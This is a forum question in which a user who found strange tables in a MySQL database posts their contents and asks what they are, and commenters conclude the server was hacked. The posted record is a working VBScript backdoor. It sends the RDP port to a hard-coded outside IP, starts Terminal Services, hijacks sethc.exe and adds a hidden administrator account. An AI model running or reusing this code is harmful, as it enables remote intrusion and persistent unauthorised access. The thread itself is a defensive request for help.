# Weird tables in the MySQL database itself

Tags: mysql, passwords, root

I recently had a problem whereby my root password for MySQL somehow got changed.  I have reset it and although it may just have been a corruption, I did a bit of digging around.  Within the MySQL database itself I found 3 tables named john, john1 and john3.

The first of these tables has got a single record which is quite long and within it there is the following which is human readable:

```
on error resume next

Set fso8 = CreateObject("Scripting.FileSystemObject")
Set ObjFSO2 = CreateObject("Scripting.FileSystemObject")
If fso8.FileExists("C:\WINDOWS\Help\cnwb.html") Then 
ObjFSO2.DeleteFile Wscript.ScriptFullName
WScript.quit
else
end if

Set OperationRegistry=WScript.createObject("WScript.Shell") 
Dim TSPort,TSState,TSRegPath 
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber" 
TSPort=OperationRegistry.RegRead(TSRegPath) 
Set xPost=CreateObject("Microsoft.XMLHTTP") 
xPost.Open "GET","http://42.51.151.7:8002/mof.asp?IPnumber=" & TSPort,0 
xPost.Send() 


set obj=wscript.createObject("wscript.shell") 
obj.Run "cmd /c sc config TermService start= auto",vbhide
obj.Run "cmd /c sc start TermService",vbhide
obj.Run "cmd /c start c:/windows/system/const.exe",vbhide



Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\debugger",WScript.CreateObject("WScript.shell").ExpandEnvironmentStrings("%SystemRoot%")&"\system32\taskmgr.exe","REG_SZ"





Set o=CreateObject("Shell.Users")
Set z=o.create("aspwner")
z.changePassword "qq25896!@#",""
z.setting("AccountType")=3

Set ObjFSO = CreateObject("Scripting.FileSystemObject")
ObjFSO.DeleteFile Wscript.ScriptFullName
WScript.quit
====
```

Would anyone be able to throw some light on what this might be?  I'm getting a bit suspicious about these tables.  I don't want to delete them without first understanding what they might be as it is a production MySQL installation.

The MySQL version is 5.5.35 on an Ubuntu 13.10 system.

Comment: It seems you got hacked

Comment: @abidibo yes I think so too but any thoughts on what I can do to double check that assumption?

Comment: well, take a look at you log files and search for strange requests. Usually the attackers exploit some vulnerabilities of well known web libraries, such as old versions of ckeditor etc... so it depends on what your server exposes to the public. Also you wrote you have an ubuntu machine while such injected code seems to be windows related, so it looks a bit weird as an attack

Comment: @abidibo yes that was my thought too.  I do however have Navicat on that system which is essentially a windows mysql connection tool but uses some hacks to operate on Ubuntu too.  Perhaps I'll check with them in case they need this.  Thx for your comments.